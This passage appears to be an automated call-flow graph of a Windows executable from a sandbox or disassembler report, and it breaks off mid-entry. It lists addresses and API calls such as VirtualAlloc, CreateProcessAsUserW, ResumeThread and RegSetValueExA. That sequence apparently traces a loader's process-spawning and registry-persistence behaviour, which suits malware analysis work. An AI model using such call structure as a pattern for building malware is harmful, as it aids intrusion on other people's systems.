76388->76393 76390 28f16f5 VirtualFree 76389->76390 76392 28f170d 76390->76392 76391->76382 76392->76329 76394 28f1c00 VirtualFree 76393->76394 76395 28f1ba4 76393->76395 76394->76329 76395->76329 76397 28f1681 76396->76397 76398 28f164d 76396->76398 76397->76363 76398->76397 76399 28f164f Sleep 76398->76399 76400 28f1664 76399->76400 76400->76397 76401 28f1668 Sleep 76400->76401 76401->76398 76406 28f1560 76402->76406 76404 28f15d4 VirtualAlloc 76405 28f15eb 76404->76405 76405->76378 76407 28f1500 76406->76407 76407->76404 76408 2917074 76409 28f4860 11 API calls 76408->76409 76410 2917095 76409->76410 76411 28f47ec 11 API calls 76410->76411 76412 29170cc 76411->76412 76413 29089d0 20 API calls 76412->76413 76414 29170f0 76413->76414 76415 28f4860 11 API calls 76414->76415 76416 2917111 76415->76416 76417 28f47ec 11 API calls 76416->76417 76418 2917148 76417->76418 76419 29089d0 20 API calls 76418->76419 76420 291716c 76419->76420 76421 28f4860 11 API calls 76420->76421 76422 291718d 76421->76422 76423 28f47ec 11 API calls 76422->76423 76424 29171c4 76423->76424 76425 29089d0 20 API calls 76424->76425 76426 29171e8 76425->76426 76427 28f4860 11 API calls 76426->76427 76428 2917209 76427->76428 76429 28f47ec 11 API calls 76428->76429 76430 2917240 76429->76430 76431 29089d0 20 API calls 76430->76431 76432 2917264 76431->76432 76433 28f4860 11 API calls 76432->76433 76434 2917285 76433->76434 76435 28f47ec 11 API calls 76434->76435 76436 29172bc 76435->76436 76437 29089d0 20 API calls 76436->76437 76438 29172e0 76437->76438 76439 28f4860 11 API calls 76438->76439 76440 291731a 76439->76440 77229 290e0f8 76440->77229 76442 2917349 77239 290f214 76442->77239 76445 28f4860 11 API calls 76446 2917399 76445->76446 76447 28f47ec 11 API calls 76446->76447 76448 29173d0 76447->76448 76449 29089d0 20 API calls 76448->76449 76450 29173f4 76449->76450 76451 28f4860 11 API calls 76450->76451 76452 2917415 76451->76452 76453 28f47ec 11 API calls 76452->76453 76454 291744c 76453->76454 76455 29089d0 20 API calls 76454->76455 76456 2917470 76455->76456 76457 28f4860 11 API calls 76456->76457 76458 2917491 76457->76458 76459 28f47ec 11 API calls 76458->76459 76460 29174c8 76459->76460 76461 29089d0 20 API calls 76460->76461 76462 29174ec 76461->76462 76463 28f4860 11 API calls 76462->76463 76464 291750d 76463->76464 76465 28f47ec 11 API calls 76464->76465 76466 2917544 76465->76466 76467 29089d0 20 API calls 76466->76467 76468 2917568 76467->76468 76469 28f4860 11 API calls 76468->76469 76470 2917589 76469->76470 76471 28f47ec 11 API calls 76470->76471 76472 29175c0 76471->76472 76473 29089d0 20 API calls 76472->76473 76474 29175e4 76473->76474 76475 28f4860 11 API calls 76474->76475 76476 2917605 76475->76476 76477 28f47ec 11 API calls 76476->76477 76478 291763c 76477->76478 76479 29089d0 20 API calls 76478->76479 76480 2917660 76479->76480 76481 28f4860 11 API calls 76480->76481 76482 2917681 76481->76482 76483 28f47ec 11 API calls 76482->76483 76484 29176b8 76483->76484 76485 29089d0 20 API calls 76484->76485 76486 29176dc 76485->76486 76487 28f4860 11 API calls 76486->76487 76488 29176fd 76487->76488 76489 28f47ec 11 API calls 76488->76489 76490 2917734 76489->76490 76491 29089d0 20 API calls 76490->76491 76492 2917758 76491->76492 76493 28f4860 11 API calls 76492->76493 76494 2917779 76493->76494 76495 28f47ec 11 API calls 76494->76495 76496 29177b0 76495->76496 76497 29089d0 20 API calls 76496->76497 76498 29177d4 76497->76498 76499 29177e9 76498->76499 76500 2918318 76498->76500 76501 28f4860 11 API calls 76499->76501 76502 28f4860 11 API calls 76500->76502 76503 291780a 76501->76503 76504 2918339 76502->76504 76505 28f47ec 11 API calls 76503->76505 76506 28f47ec 11 API calls 76504->76506 76507 2917841 76505->76507 76508 2918370 76506->76508 76510 29089d0 20 API calls 76507->76510 76509 29089d0 20 API calls 76508->76509 76511 2918394 76509->76511 76512 2917865 76510->76512 76514 28f4860 11 API calls 76511->76514 76513 28f4860 11 API calls 76512->76513 76515 2917886 76513->76515 76516 29183b5 76514->76516 76517 28f47ec 11 API calls 76515->76517 76518 28f47ec 11 API calls 76516->76518 76519 29178bd 76517->76519 76520 29183ec 76518->76520 76521 29089d0 20 API calls 76519->76521 76522 29089d0 20 API calls 76520->76522 76523 29178e1 76521->76523 76524 2918410 76522->76524 76526 28f4860 11 API calls 76523->76526 76525 28f4860 11 API calls 76524->76525 76528 2918431 76525->76528 76527 2917902 76526->76527 76529 28f47ec 11 API calls 76527->76529 76530 28f47ec 11 API calls 76528->76530 76531 2917939 76529->76531 76532 2918468 76530->76532 76533 29089d0 20 API calls 76531->76533 76534 29089d0 20 API calls 76532->76534 76535 291795d 76533->76535 76536 291848c 76534->76536 76537 28f47ec 11 API calls 76535->76537 76538 28f4860 11 API calls 76536->76538 76539 2917975 76537->76539 76541 29184ad 76538->76541 77392 29085bc 76539->77392 76544 28f47ec 11 API calls 76541->76544 76543 28f4860 11 API calls 76545 29179a7 76543->76545 76546 29184e4 76544->76546 76547 28f47ec 11 API calls 76545->76547 76548 29089d0 20 API calls 76546->76548 76550 29179de 76547->76550 76549 2918508 76548->76549 76551 29193a1 76549->76551 76552 291851d 76549->76552 76556 29089d0 20 API calls 76550->76556 76553 28f4860 11 API calls 76551->76553 76554 28f4860 11 API calls 76552->76554 76560 29193c2 76553->76560 76555 291853e 76554->76555 76559 2918556 76555->76559 76557 2917a02 76556->76557 76558 28f4860 11 API calls 76557->76558 76563 2917a23 76558->76563 76562 28f47ec 11 API calls 76559->76562 76561 28f47ec 11 API calls 76560->76561 76566 29193f9 76561->76566 76564 2918575 76562->76564 76565 28f47ec 11 API calls 76563->76565 76567 291858d 76564->76567 76571 2917a5a 76565->76571 76568 29089d0 20 API calls 76566->76568 76569 29089d0 20 API calls 76567->76569 76570 291941d 76568->76570 76572 2918599 76569->76572 76573 28f4860 11 API calls 76570->76573 76575 29089d0 20 API calls 76571->76575 76574 28f4860 11 API calls 76572->76574 76579 291943e 76573->76579 76576 29185ba 76574->76576 76577 2917a7e 76575->76577 76580 29185c5 76576->76580 76578 28f4860 11 API calls 76577->76578 76583 2917a9f 76578->76583 76582 28f47ec 11 API calls 76579->76582 76581 28f47ec 11 API calls 76580->76581 76584 29185f1 76581->76584 76586 2919475 76582->76586 76585 28f47ec 11 API calls 76583->76585 76587 29185fc 76584->76587 76591 2917ad6 76585->76591 76588 29089d0 20 API calls 76586->76588 76589 29089d0 20 API calls 76587->76589 76590 2919499 76588->76590 76592 2918615 76589->76592 76593 28f4860 11 API calls 76590->76593 76595 29089d0 20 API calls 76591->76595 76594 28f4860 11 API calls 76592->76594 76596 29194ba 76593->76596 76597 2918636 76594->76597 76598 2917afa 76595->76598 76600 28f47ec 11 API calls 76596->76600 76599 28f47ec 11 API calls 76597->76599 77404 290adf8 29 API calls 76598->77404 76605 291866d 76599->76605 76604 29194f1 76600->76604 76602 2917b21 76603 28f4860 11 API calls 76602->76603 76608 2917b42 76603->76608 76606 29089d0 20 API calls 76604->76606 76607 29089d0 20 API calls 76605->76607 76616 2919515 76606->76616 76609 2918691 76607->76609 76611 28f47ec 11 API calls 76608->76611 76610 28f47ec 11 API calls 76609->76610 76612 29186bd 76610->76612 76617 2917b79 76611->76617 76615 29186d5 76612->76615 76613 2919cf5 76614 28f4860 11 API calls 76613->76614 76620 2919d16 76614->76620 76619 29186e0 CreateProcessAsUserW 76615->76619 76616->76613 76618 28f4860 11 API calls 76616->76618 76621 29089d0 20 API calls 76617->76621 76630 2919560 76618->76630 76622 29186f2 76619->76622 76623 291876e 76619->76623 76626 28f47ec 11 API calls 76620->76626 76624 2917b9d 76621->76624 76628 28f4860 11 API calls 76622->76628 76625 28f4860 11 API calls 76623->76625 76627 28f4860 11 API calls 76624->76627 76633 291878f 76625->76633 76634 2919d4d 76626->76634 76635 2917bbe 76627->76635 76629 2918713 76628->76629 76632 291871e 76629->76632 76631 28f47ec 11 API calls 76630->76631 76640 2919597 76631->76640 76639 28f47ec 11 API calls 76632->76639 76636 28f47ec 11 API calls 76633->76636 76637 29089d0 20 API calls 76634->76637 76638 28f47ec 11 API calls 76635->76638 76647 29187c6 76636->76647 76641 2919d71 76637->76641 76648 2917bf5 76638->76648 76642 291874a 76639->76642 76644 29089d0 20 API calls 76640->76644 76643 28f4860 11 API calls 76641->76643 76645 2918755 76642->76645 76651 2919d92 76643->76651 76646 29195bb 76644->76646 76653 29089d0 20 API calls 76645->76653 76649 28f4860 11 API calls 76646->76649 76650 29089d0 20 API calls 76647->76650 76652 29089d0 20 API calls 76648->76652 76659 29195dc 76649->76659 76654 29187ea 76650->76654 76657 28f47ec 11 API calls 76651->76657 76655 2917c19 76652->76655 76653->76623 76656 28f4860 11 API calls 76654->76656 76658 28f4860 11 API calls 76655->76658 76661 291880b 76656->76661 76662 2919dc9 76657->76662 76663 2917c3a 76658->76663 76660 28f47ec 11 API calls 76659->76660 76667 2919613 76660->76667 76664 28f47ec 11 API calls 76661->76664 76665 29089d0 20 API calls 76662->76665 76666 28f47ec 11 API calls 76663->76666 76672 2918842 76664->76672 76668 2919ded 76665->76668 76673 2917c71 76666->76673 76670 29089d0 20 API calls 76667->76670 76669 28f4860 11 API calls 76668->76669 76676 2919e0e 76669->76676 76671 2919637 76670->76671 76674 28f4860 11 API calls 76671->76674 76675 29089d0 20 API calls 76672->76675 76677 29089d0 20 API calls 76673->76677 76681 2919658 76674->76681 76678 2918866 76675->76678 76680 28f47ec 11 API calls 76676->76680 76679 2917c95 76677->76679 76682 28f49f8 11 API calls 76678->76682 76683 28f4860 11 API calls 76679->76683 76686 2919e45 76680->76686 76685 28f47ec 11 API calls 76681->76685 76684 291888a 76682->76684 76689 2917cd5 76683->76689 76687 28f4860 11 API calls 76684->76687 76691 291968f 76685->76691 76688 29089d0 20 API calls 76686->76688 76690 29188b9 76687->76690 76695 2919e69 76688->76695 76692 28f47ec 11 API calls 76689->76692 76696 29188c4 76690->76696 76693 29089d0 20 API calls 76691->76693 76701 2917d0c 76692->76701 76694 29196b3 76693->76694 76697 290f094 11 API calls 76694->76697 76700 29089d0 20 API calls 76695->76700 76698 28f47ec 11 API calls 76696->76698 76699 29196ce 76697->76699 76702 29188f0 76698->76702 76703 28f4860 11 API calls 76699->76703 76706 2919e9c 76700->76706 76704 29089d0 20 API calls 76701->76704 76708 29188fb 76702->76708 76709 29196f7 76703->76709 76705 2917d30 76704->76705 76707 28f4860 11 API calls 76705->76707 76711 29089d0 20 API calls 76706->76711 76715 2917d51 76707->76715 76710 29089d0 20 API calls 76708->76710 76714 28f4860 11 API calls 76709->76714 76712 2918914 76710->76712 76716 2919ecf 76711->76716 76713 28f4860 11 API calls 76712->76713 76719 2918935 76713->76719 76718 291972f 76714->76718 76717 28f47ec 11 API calls 76715->76717 76720 29089d0 20 API calls 76716->76720 76723 2917d88 76717->76723 76721 28f47ec 11 API calls 76718->76721 76722 28f47ec 11 API calls 76719->76722 76724 2919f02 76720->76724 76726 2919766 76721->76726 76728 291896c 76722->76728 76725 29089d0 20 API calls 76723->76725 76729 29089d0 20 API calls 76724->76729 76727 2917dac 76725->76727 76731 29089d0 20 API calls 76726->76731 76730 28f4860 11 API calls 76727->76730 76733 29089d0 20 API calls 76728->76733 76732 2919f35 76729->76732 76739 2917dcd 76730->76739 76734 291978a 76731->76734 76735 28f4860 11 API calls 76732->76735 76736 2918990 76733->76736 76737 28f4860 11 API calls 76734->76737 76740 2919f56 76735->76740 76738 28f4860 11 API calls 76736->76738 76743 29197ab 76737->76743 76742 29189b1 76738->76742 76741 28f47ec 11 API calls 76739->76741 76744 28f47ec 11 API calls 76740->76744 76747 2917e04 76741->76747 76746 28f47ec 11 API calls 76742->76746 76745 28f47ec 11 API calls 76743->76745 76748 2919f8d 76744->76748 76750 29197e2 76745->76750 76752 29189e8 76746->76752 76749 29089d0 20 API calls 76747->76749 76753 29089d0 20 API calls 76748->76753 76751 2917e28 76749->76751 76755 29089d0 20 API calls 76750->76755 77405 2905aec 42 API calls 76751->77405 76758 29089d0 20 API calls 76752->76758 76756 2919fb1 76753->76756 76759 2919806 76755->76759 76760 28f4860 11 API calls 76756->76760 76762 2918a0c 76758->76762 77408 28f7e5c 76759->77408 76773 2919fd2 76760->76773 76761 2917e54 76769 28f4bcc 11 API calls 76761->76769 77251 290d164 76762->77251 76767 2919818 76771 28f4860 11 API calls 76767->76771 76768 2919aef 76772 28f4860 11 API calls 76768->76772 76774 2917e69 76769->76774 76770 28f4860 11 API calls 76777 2918a46 76770->76777 76778 2919839 76771->76778 76779 2919b10 76772->76779 76776 28f47ec 11 API calls 76773->76776 76775 28f4860 11 API calls 76774->76775 76780 2917e8a 76775->76780 76784 291a009 76776->76784 76781 28f47ec 11 API calls 76777->76781 76782 28f47ec 11 API calls 76778->76782 76783 28f47ec 11 API calls 76779->76783 76785 28f47ec 11 API calls 76780->76785 76788 2918a7d 76781->76788 76789 2919870 76782->76789 76790 2919b47 76783->76790 76786 29089d0 20 API calls 76784->76786 76792 2917ec1 76785->76792 76787 291a02d 76786->76787 76791 28f4860 11 API calls 76787->76791 76793 29089d0 20 API calls 76788->76793 76794 29089d0 20 API calls 76789->76794 76795 29089d0 20 API calls 76790->76795 76803 291a04e 76791->76803 76799 29089d0 20 API calls 76792->76799 76796 2918aa1 76793->76796 76797 2919894 76794->76797 76798 2919b6b 76795->76798 76800 28f4860 11 API calls 76796->76800 76801 28f4860 11 API calls 76797->76801 76802 28f4860 11 API calls 76798->76802 76804 2917ee5 76799->76804 76807 2918ac2 76800->76807 76810 29198b5 76801->76810 76808 2919b8c 76802->76808 76805 28f47ec 11 API calls 76803->76805 76806 28f49f8 11 API calls 76804->76806 76815 291a085 76805->76815 76809 2917f02 76806->76809 76812 28f47ec 11 API calls 76807->76812 76814 28f47ec 11 API calls 76808->76814 77406 2907e50 17 API calls 76809->77406 76813 28f47ec 11 API calls 76810->76813 76819 2918af9 76812->76819 76820 29198ec 76813->76820 76821 2919bc3 76814->76821 76818 29089d0 20 API calls 76815->76818 76816 2917f08 76817 28f4860 11 API calls 76816->76817 76822 2917f29 76817->76822 76826 291a0a9 76818->76826 76823 29089d0 20 API calls 76819->76823 76824 29089d0 20 API calls 76820->76824 76825 29089d0 20 API calls 76821->76825 76830 28f47ec 11 API calls 76822->76830 76827 2918b1d 76823->76827 76828 2919910 76824->76828 76829 2919be7 76825->76829 76834 29089d0 20 API calls 76826->76834 76831 28f4860 11 API calls 76827->76831 76832 28f4860 11 API calls 76828->76832 76833 28f4860 11 API calls 76829->76833 76835 2917f60 76830->76835 76836 2918b3e 76831->76836 76837 2919931 76832->76837 76838 2919c08 76833->76838 76839 291a0dc 76834->76839 76840 29089d0 20 API calls 76835->76840 76841 28f47ec 11 API calls 76836->76841 76845 28f47ec 11 API calls 76837->76845 76842 28f47ec 11 API calls 76838->76842 76843 29089d0 20 API calls 76839->76843 76844 2917f84 76840->76844 76847 2918b75 76841->76847 76849 2919c3f 76842->76849 76850 291a10f 76843->76850 76846 28f4860 11 API calls 76844->76846 76848 2919968 76845->76848 76851 2917fa5 76846->76851 76852 29089d0 20 API calls 76847->76852 76853 29089d0 20 API calls 76848->76853 76854 29089d0 20 API calls 76849->76854 76855 29089d0 20 API calls 76850->76855 76859 28f47ec 11 API calls 76851->76859 76856 2918b99 76852->76856 76857 291998c 76853->76857 76858 2919c63 76854->76858 76867 291a142 76855->76867 76860 2918bb9 76856->76860 77387 2908730 76856->77387 76861 290e358 11 API calls 76857->76861 76862 28f4860 11 API calls 76858->76862 76869 2917fdc 76859->76869 76864 28f4860 11 API calls 76860->76864 76865 29199a1 76861->76865 76871 2919c84 76862->76871 76873 2918bda 76864->76873 76866 28f4530 11 API calls 76865->76866 76868 29199b1 76866->76868 76872 29089d0 20 API calls 76867->76872 76870 28f4860 11 API calls 76868->76870 76874 29089d0 20 API calls 76869->76874 76880 29199d2 76870->76880 76876 28f47ec 11 API calls 76871->76876 76879 291a175 76872->76879 76875 28f47ec 11 API calls 76873->76875 76877 2918000 76874->76877 76884 2918c11 76875->76884 76882 2919cbb 76876->76882 76878 28f4860 11 API calls 76877->76878 76886 2918021 76878->76886 76883 29089d0 20 API calls 76879->76883 76881 28f47ec 11 API calls 76880->76881 76893 2919a09 76881->76893 76887 29089d0 20 API calls 76882->76887 76885 291a1a8 76883->76885 76889 29089d0 20 API calls 76884->76889 76888 28f4860 11 API calls 76885->76888 76891 28f47ec 11 API calls 76886->76891 76890 2919cdf 76887->76890 76899 291a1c9 76888->76899 76892 2918c35 76889->76892 76894 28f49f8 11 API calls 76890->76894 76901 2918058 76891->76901 76895 28f4860 11 API calls 76892->76895 76897 29089d0 20 API calls 76893->76897 76896 2919ce9 76894->76896 76904 2918c56 76895->76904 77412 2908d70 31 API calls 76896->77412 76900 2919a2d 76897->76900 76903 28f47ec 11 API calls 76899->76903 76902 28f4860 11 API calls 76900->76902 76905 29089d0 20 API calls 76901->76905 76909 2919a4e 76902->76909 76910 291a200 76903->76910 76907 28f47ec 11 API calls 76904->76907 76906 291807c 76905->76906 76908 28f4860 11 API calls 76906->76908 76912 2918c8d 76907->76912 76915 291809d 76908->76915 76913 28f47ec 11 API calls 76909->76913 76911 29089d0 20 API calls 76910->76911 76914 291a224 76911->76914 76917 29089d0 20 API calls 76912->76917 76920 2919a85 76913->76920 76916 28f4860 11 API calls 76914->76916 76918 28f47ec 11 API calls 76915->76918 76923 291a245 76916->76923 76919 2918cb1 76917->76919 76924 29180d4 76918->76924 76921 28f4860 11 API calls 76919->76921 76922 29089d0 20 API calls 76920->76922 76926 2918cd2 76921->76926 76932 2919aa9 76922->76932 76925 28f47ec 11 API calls 76923->76925 76927 29089d0 20 API calls 76924->76927 76931 291a27c 76925->76931 76929 28f47ec 11 API calls 76926->76929 76928 29180f8 76927->76928 77407 290b118 39 API calls 76928->77407 76933 2918d09 76929->76933 76935 29089d0 20 API calls 76931->76935 76934 290dc8c 17 API calls 76932->76934 76937 29089d0 20 API calls 76933->76937 76934->76768 76939 291a2a0 76935->76939 76936 2918109 76938 2918d2d ResumeThread 76937->76938 76940 28f4860 11 API calls 76938->76940 76941 29089d0 20 API calls 76939->76941 76944 2918d59 76940->76944 76942 291a2d3 76941->76942 76943 28f4860 11 API calls 76942->76943 76946 291a2f4 76943->76946 76945 28f47ec 11 API calls 76944->76945 76948 2918d90 76945->76948 76947 28f47ec 11 API calls 76946->76947 76951 291a32b 76947->76951 76949 29089d0 20 API calls 76948->76949 76950 2918db4 76949->76950 76952 28f4860 11 API calls 76950->76952 76953 29089d0 20 API calls 76951->76953 76956 2918dd5 76952->76956 76954 291a34f 76953->76954 76955 28f4860 11 API calls 76954->76955 76958 291a370 76955->76958 76957 28f47ec 11 API calls 76956->76957 76960 2918e0c 76957->76960 76959 28f47ec 11 API calls 76958->76959 76964 291a3a7 76959->76964 76961 29089d0 20 API calls 76960->76961 76962 2918e30 76961->76962 76963 28f4860 11 API calls 76962->76963 76968 2918e51 76963->76968 76965 29089d0 20 API calls 76964->76965 76966 291a3cb 76965->76966 76967 28f4860 11 API calls 76966->76967 76970 291a3ec 76967->76970 76969 28f47ec 11 API calls 76968->76969 76972 2918e88 76969->76972 76971 28f47ec 11 API calls 76970->76971 76975 291a423 76971->76975 76973 29089d0 20 API calls 76972->76973 76974 2918eac CloseHandle 76973->76974 76976 28f4860 11 API calls 76974->76976 76977 29089d0 20 API calls 76975->76977 76978 2918ed8 76976->76978 76979 291a447 76977->76979 76980 28f47ec 11 API calls 76978->76980 76981 29089d0 20 API calls 76979->76981 76982 2918f0f 76980->76982 76983 291a47a 76981->76983 76984 29089d0 20 API calls 76982->76984 76986 29089d0 20 API calls 76983->76986 76985 2918f33 76984->76985 76987 28f4860 11 API calls 76985->76987 76989 291a4ad 76986->76989 76988 2918f54 76987->76988 76991 28f47ec 11 API calls 76988->76991 76990 29089d0 20 API calls 76989->76990 76992 291a4e0 76990->76992 76993 2918f8b 76991->76993 76994 29089d0 20 API calls 76992->76994 76995 29089d0 20 API calls 76993->76995 76996 291a513 76994->76996 76997 2918faf 76995->76997 76998 28f4860 11 API calls 76996->76998 76999 28f4860 11 API calls 76997->76999 77000 291a534 76998->77000 77001 2918fd0 76999->77001 77003 28f47ec 11 API calls 77000->77003 77002 28f47ec 11 API calls 77001->77002 77005 2919007 77002->77005 77004 291a56b 77003->77004 77006 29089d0 20 API calls 77004->77006 77007 29089d0 20 API calls 77005->77007 77008 291a58f 77006->77008 77009 291902b 77007->77009 77010 28f4860 11 API calls 77008->77010 77011 28f4860 11 API calls 77009->77011 77012 291a5b0 77010->77012 77013 291904c 77011->77013 77014 28f47ec 11 API calls 77012->77014 77015 28f47ec 11 API calls 77013->77015 77016 291a5e7 77014->77016 77017 2919083 77015->77017 77018 29089d0 20 API calls 77016->77018 77019 29089d0 20 API calls 77017->77019 77022 291a60b 77018->77022 77020 29190a7 77019->77020 77021 28f4860 11 API calls 77020->77021 77024 29190c8 77021->77024 77023 29089d0 20 API calls 77022->77023 77026 291a63e 77023->77026 77025 28f47ec 11 API calls 77024->77025 77027 29190ff 77025->77027 77028 29089d0 20 API calls 77026->77028 77029 29089d0 20 API calls 77027->77029 77031 291a671 77028->77031 77030 2919123 77029->77030 77032 28f4860 11 API calls 77030->77032 77033 29089d0 20 API calls 77031->77033 77034 2919144 77032->77034 77035 291a6a4 77033->77035 77036 28f47ec 11 API calls 77034->77036 77037 29089d0 20 API calls 77035->77037 77038 291917b 77036->77038 77040 291a6d7 77037->77040 77039 29089d0 20 API calls 77038->77039 77041 291919f 77039->77041 77042 29089d0 20 API calls 77040->77042 77043 28f4860 11 API calls 77041->77043 77044 291a70a 77042->77044 77046 29191c0 77043->77046 77045 28f4860 11 API calls 77044->77045 77047 291a72b 77045->77047 77048 28f47ec 11 API calls 77046->77048 77049 28f47ec 11 API calls 77047->77049 77050 29191f7 77048->77050 77051 291a762 77049->77051 77052 29089d0 20 API calls 77050->77052 77054 29089d0 20 API calls 77051->77054 77053 291921b 77052->77053 77057 290894c 21 API calls 77053->77057 77055 291a786 77054->77055 77056 28f4860 11 API calls 77055->77056 77061 291a7a7 77056->77061 77058 291923a 77057->77058 77059 290894c 21 API calls 77058->77059 77060 291924e 77059->77060 77062 290894c 21 API calls 77060->77062 77064 28f47ec 11 API calls 77061->77064 77063 2919262 77062->77063 77065 290894c 21 API calls 77063->77065 77069 291a7de 77064->77069 77066 2919276 77065->77066 77067 290894c 21 API calls 77066->77067 77068 291928a 77067->77068 77070 290894c 21 API calls 77068->77070 77072 29089d0 20 API calls 77069->77072 77071 291929e CloseHandle 77070->77071 77073 28f4860 11 API calls 77071->77073 77074 291a802 77072->77074 77076 29192ca 77073->77076 77075 28f4860 11 API calls 77074->77075 77077 291a823 77075->77077 77078 28f47ec 11 API calls 77076->77078 77079 28f47ec 11 API calls 77077->77079 77080 2919301 77078->77080 77081 291a85a 77079->77081 77082 29089d0 20 API calls 77080->77082 77084 29089d0 20 API calls 77081->77084 77083 2919325 77082->77083 77085 28f4860 11 API calls 77083->77085 77086 291a87e 77084->77086 77088 2919346 77085->77088 77087 28f4860 11 API calls 77086->77087 77089 291a89f 77087->77089 77090 28f47ec 11 API calls 77088->77090 77091 28f47ec 11 API calls 77089->77091 77092 291937d 77090->77092 77093 291a8d6 77091->77093 77094 29089d0 20 API calls 77092->77094 77095 29089d0 20 API calls 77093->77095 77094->76551 77096 291a8fa 77095->77096 77097 28f4860 11 API calls 77096->77097 77098 291a91b 77097->77098 77099 28f47ec 11 API calls 77098->77099 77100 291a952 77099->77100 77101 29089d0 20 API calls 77100->77101 77102 291a976 77101->77102 77103 29089d0 20 API calls 77102->77103 77104 291a985 77103->77104 77105 29089d0 20 API calls 77104->77105 77106 291a994 77105->77106 77107 29089d0 20 API calls 77106->77107 77108 291a9a3 77107->77108 77109 29089d0 20 API calls 77108->77109 77110 291a9b2 77109->77110 77111 29089d0 20 API calls 77110->77111 77112 291a9c1 77111->77112 77113 29089d0 20 API calls 77112->77113 77114 291a9d0 77113->77114 77115 29089d0 20 API calls 77114->77115 77116 291a9df 77115->77116 77117 29089d0 20 API calls 77116->77117 77118 291a9ee 77117->77118 77119 29089d0 20 API calls 77118->77119 77120 291a9fd 77119->77120 77121 29089d0 20 API calls 77120->77121 77122 291aa0c 77121->77122 77123 29089d0 20 API calls 77122->77123 77124 291aa1b 77123->77124 77125 29089d0 20 API calls 77124->77125 77126 291aa2a 77125->77126 77127 29089d0 20 API calls 77126->77127 77128 291aa39 77127->77128 77129 29089d0 20 API calls 77128->77129 77130 291aa48 77129->77130 77131 29089d0 20 API calls 77130->77131 77132 291aa57 77131->77132 77133 28f4860 11 API calls 77132->77133 77134 291aa78 77133->77134 77135 28f47ec 11 API calls 77134->77135 77136 291aaaf 77135->77136 77137 29089d0 20 API calls 77136->77137 77138 291aad3 77137->77138 77139 29089d0 20 API calls 77138->77139 77140 291ab06 77139->77140 77141 29089d0 20 API calls 77140->77141 77142 291ab39 77141->77142 77143 29089d0 20 API calls 77142->77143 77144 291ab6c 77143->77144 77145 29089d0 20 API calls 77144->77145 77146 291ab9f 77145->77146 77147 29089d0 20 API calls 77146->77147 77148 291abd2 77147->77148 77149 29089d0 20 API calls 77148->77149 77150 291ac05 77149->77150 77151 29089d0 20 API calls 77150->77151 77152 291ac38 77151->77152 77153 28f4860 11 API calls 77152->77153 77154 291ac59 77153->77154 77155 28f47ec 11 API calls 77154->77155 77156 291ac90 77155->77156 77157 29089d0 20 API calls 77156->77157 77158 291acb4 77157->77158 77159 28f4860 11 API calls 77158->77159 77160 291acd5 77159->77160 77161 28f47ec 11 API calls 77160->77161 77162 291ad0c 77161->77162 77163 29089d0 20 API calls 77162->77163 77164 291ad30 77163->77164 77165 28f4860 11 API calls 77164->77165 77166 291ad51 77165->77166 77167 28f47ec 11 API calls 77166->77167 77168 291ad88 77167->77168 77169 29089d0 20 API calls 77168->77169 77170 291adac 77169->77170 77171 29089d0 20 API calls 77170->77171 77172 291addf 77171->77172 77173 29089d0 20 API calls 77172->77173 77174 291ae12 77173->77174 77175 29089d0 20 API calls 77174->77175 77176 291ae45 77175->77176 77177 29089d0 20 API calls 77176->77177 77178 291ae78 77177->77178 77179 29089d0 20 API calls 77178->77179 77180 291aeab 77179->77180 77181 29089d0 20 API calls 77180->77181 77182 291aede 77181->77182 77183 29089d0 20 API calls 77182->77183 77184 291af11 77183->77184 77185 29089d0 20 API calls 77184->77185 77186 291af44 77185->77186 77187 29089d0 20 API calls 77186->77187 77188 291af77 77187->77188 77189 29089d0 20 API calls 77188->77189 77190 291afaa 77189->77190 77191 29089d0 20 API calls 77190->77191 77192 291afdd 77191->77192 77193 29089d0 20 API calls 77192->77193 77194 291b010 77193->77194 77195 29089d0 20 API calls 77194->77195 77196 291b043 77195->77196 77197 29089d0 20 API calls 77196->77197 77198 291b076 77197->77198 77199 29089d0 20 API calls 77198->77199 77200 291b0a9 77199->77200 77201 29089d0 20 API calls 77200->77201 77202 291b0dc 77201->77202 77203 29089d0 20 API calls 77202->77203 77204 291b10f 77203->77204 77205 29089d0 20 API calls 77204->77205 77206 291b142 77205->77206 77207 29089d0 20 API calls 77206->77207 77208 291b175 77207->77208 77209 2908338 18 API calls 77208->77209 77210 291b184 77209->77210 77211 28f4860 11 API calls 77210->77211 77212 291b1a5 77211->77212 77213 28f47ec 11 API calls 77212->77213 77214 291b1dc 77213->77214 77215 29089d0 20 API calls 77214->77215 77216 291b200 77215->77216 77217 28f4860 11 API calls 77216->77217 77218 291b221 77217->77218 77219 28f47ec 11 API calls 77218->77219 77220 291b258 77219->77220 77221 29089d0 20 API calls 77220->77221 77222 291b27c 77221->77222 77223 28f4860 11 API calls 77222->77223 77224 291b29d 77223->77224 77225 28f47ec 11 API calls 77224->77225 77226 291b2d4 77225->77226 77227 29089d0 20 API calls 77226->77227 77228 291b2f8 ExitProcess 77227->77228 77234 290e114 77229->77234 77230 290e197 77231 28f44dc 11 API calls 77230->77231 77233 290e19f 77231->77233 77232 28f49f8 11 API calls 77232->77234 77235 28f4530 11 API calls 77233->77235 77234->77230 77234->77232 77236 290e1aa 77235->77236 77237 28f4500 11 API calls 77236->77237 77238 290e1c4 77237->77238 77238->76442 77240 290f22b 77239->77240 77241 290f256 RegOpenKeyA 77240->77241 77242 290f264 77241->77242 77243 28f49f8 11 API calls 77242->77243 77244 290f27c 77243->77244 77245 290f289 RegSetValueExA RegCloseKey 77244->77245 77246 290f2ad 77245->77246 77247 28f4500 11 API calls 77246->77247 77248 290f2ba 77247->77248 77249 28f44dc 11 API calls 77248->77249 77250 290f2c2 77249->77250 77250->76445 77252 290d16d 77251->77252 77252->77252 77253 28f4860 11 API calls 77252->77253 77254 290d1af 77253->77254 77255 28f47ec 11 API calls 77254->77255 77256 290d1d4 77255->77256 77257 29089d0 20 API calls 77256->77257 77258 290d1ef 77257->77258 77259 28f4860 11 API calls 77258->77259 77260 290d208 77259->77260 77261 28f47ec 11 API calls 77260->77261 77262 290d22d 77261->77262 77263 29089d0 20 API calls 77262->77263 77264 290d248 77263->77264 77265 28f4860 11 API calls 77264->77265 77266 290d261 77265->77266 77267 28f47ec 11 API calls 77266->77267 77268 290d286 77267->77268 77269 29089d0 20 API calls 77268->77269 77270 290d2a1 77269->77270 77271 28f4860 11 API calls 77270->77271 77272 290d2ba 77271->77272 77273 28f47ec 11 API calls 77272->77273 77274 290d2df 77273->77274 77275 29089d0 20 API calls 77274->77275 77276 290d2fa 77275->77276 77277 28f4860 11 API calls 77276->77277 77278 290d313 77277->77278 77279 28f47ec 11 API calls 77278->77279 77280 290d338 77279->77280 77281 29089d0 20 API calls 77280->77281 77282 